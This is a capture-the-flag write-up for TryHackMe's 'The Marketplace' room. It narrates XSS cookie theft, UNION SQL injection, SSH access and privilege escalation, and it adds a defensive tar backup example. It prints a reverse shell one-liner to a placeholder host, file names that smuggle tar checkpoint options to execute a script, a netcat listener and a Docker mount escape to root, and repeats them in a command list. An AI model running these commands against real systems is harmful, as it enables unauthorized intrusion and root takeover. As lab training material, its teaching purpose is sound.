Summary
In this video walkthrough, we demonstrated gaining root access to a Docker container running a web server with an SQL database. We started by exploiting a reflected XSS vulnerability in a website running an e-commerce marketplace. This let us gain administrative access to the admin account, where we discovered an SQL injection that revealed the database records. We used those records to log in over SSH and performed privilege escalation by exploiting the wildcard in the archiving tool tar, which eventually landed us in a Docker container. By mounting the root file system into a container of our choice, we were able to extract the root flag.
This post covers the answers for The Marketplace room in TryHackMe.
Initial Reconnaissance & Web Exploitation
I started with an Nmap scan, which revealed several open ports: SSH (234), HTTP (80), and another web server on port 32768 running Node.js. The Nmap scan also helpfully discovered an /admin directory via robots.txt.
The website itself had typical e-commerce features like login, sign-up, and product listings. I quickly identified the “New Listing” feature as a potential attack vector. After some testing, I found the site was vulnerable to reflected Cross-Site Scripting (XSS).
I crafted a cookie-stealing XSS payload to capture the admin's cookie when they reviewed a reported listing. My payload executed successfully and I captured the admin's cookie. Using this cookie, I hijacked their session, gaining access to the /admin page and securing the first flag.
Database Exploitation (SQL Injection)
Within the admin area, I saw user details, and the URL parameters (e.g., user=ID) immediately struck me as potential SQL injection points.
I systematically explored the database:
- I determined the number of columns using UNION SELECT.
- I retrieved database names, including Marketplace and information_schema.
- I dumped table names within the Marketplace database, finding items, messages, and users.
- I retrieved column names within the users table: ID, is_administrator, password, and username.
- I then dumped usernames and password hashes from the users table.
Instead of cracking the hashes, I inspected the messages table. A message there revealed a temporary SSH password for a user. I used this password to log in as the user "Jake" via SSH, which gave me the user flag.
Privilege Escalation
Once I was in as Jake, I checked his sudo privileges:
sudo -l
This showed that Jake could run a backup.sh script as the user "Michael" without a password. I viewed the script's contents:
cat /opt/backup.sh
I noticed the backup.sh script used tar with a wildcard (*), which is a known vulnerability! I created a malicious shell script (shell.sh) containing a reverse shell that connects back to my Netcat listener:
echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
chmod +x shell.sh
I then exploited the tar wildcard vulnerability by creating files whose names tar would interpret as options, instructing it to execute my shell.sh script during the backup process:
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
On my machine, I set up a Netcat listener:
nc -lvnp 4545
Then, I ran the backup.sh script as Michael:
sudo -u michael /opt/backup.sh
This triggered the reverse shell, granting me access as Michael. I quickly checked Michael's groups and found he was a member of the docker group. This was a significant finding!
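For the defensive side of this step, here is an added example (my own, not the room's backup.sh) in POSIX sh: a backup function that never lets file names reach tar's command line, and a check for the option-shaped names that a bare wildcard would hand to tar. It assumes GNU or BusyBox tar and builds its own throwaway directory.

```shell
#!/bin/sh
# Added example, not the room's own /opt/backup.sh. It shows the hardened
# form of the pattern the write-up abuses: a backup that runs tar on a
# directory without expanding file names onto tar's command line, plus a
# check an auditor can run to spot file names that a bare "tar ... *"
# would parse as options. Assumes GNU or BusyBox tar.

# Archive the contents of directory "$1" into "$2". "-C" changes into the
# directory and the single operand "." names it, so no file inside it is
# ever placed on the command line where tar would read it as an option.
safe_backup() {
    src="$1"
    out="$2"
    tar -C "$src" -cf "$out" -- .
}

# Count top-level names in "$1" that begin with a dash. With a wildcard
# such as "tar -cf out.tar *" each of these would reach tar as an option
# (for example --checkpoint=1), which is the root cause of the escalation.
count_option_like_names() {
    n=0
    for f in "$1"/*; do
        case "${f##*/}" in
            -*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Check that archive "$1" lists "$2" as a plain entry (tar stores the
# contents of "." as "./name"), i.e. the option-looking file was archived
# as data rather than acted upon.
archive_has_entry() {
    tar -tf "$1" | grep -qxF -- "./$2"
}

# Constructed demo directory: one ordinary file and two names shaped like
# the ones in the write-up (nothing in them is executed).
make_demo_dir() {
    d=$(mktemp -d)
    touch "$d/data.txt" "$d/--checkpoint=1" "$d/--checkpoint-action=exec=sh shell.sh"
    echo "$d"
}

demo=$(make_demo_dir)
echo "option-like names: $(count_option_like_names "$demo")"   # 2
safe_backup "$demo" "$demo.tar"
archive_has_entry "$demo.tar" "--checkpoint=1" && echo "archived as data, not parsed as an option"
```

The same root cause is removed by any invocation that passes a directory operand instead of a glob; the count function is only a quick audit aid for existing backup jobs.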
I listed the Docker images:
docker images
Finally, I exploited the Docker group membership to gain root access to the host system. I ran a Docker container (Alpine) and mounted the host's entire file system at /mnt inside the container:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
This effectively gave me a root shell on the host system. I navigated to the /root directory and retrieved the root flag.
Technical Commands Used:
- python -m http.server (or python -m SimpleHTTPServer for Python 2)
- echo <base64_string> | base64 -d
- SQL injection payloads (conceptual, for UNION SELECT, information_schema.schemata, information_schema.tables, information_schema.columns, and dumping user data)
- ssh jake@<IP_ADDRESS>
- sudo -l
- cat /opt/backup.sh
- echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
- echo "" > "--checkpoint-action=exec=sh shell.sh"
- echo "" > "--checkpoint=1"
- chmod +x shell.sh
- sudo -u michael /opt/backup.sh
- nc -lvnp 4545
- docker images
- docker run -v /:/mnt --rm -it alpine chroot /mnt sh
- id
- ls
- cd /root
- cat user.txt
- cat root.txt
TryHackMe The Marketplace Answers
What is flag 2? (User.txt)
What is flag 3? (Root.txt)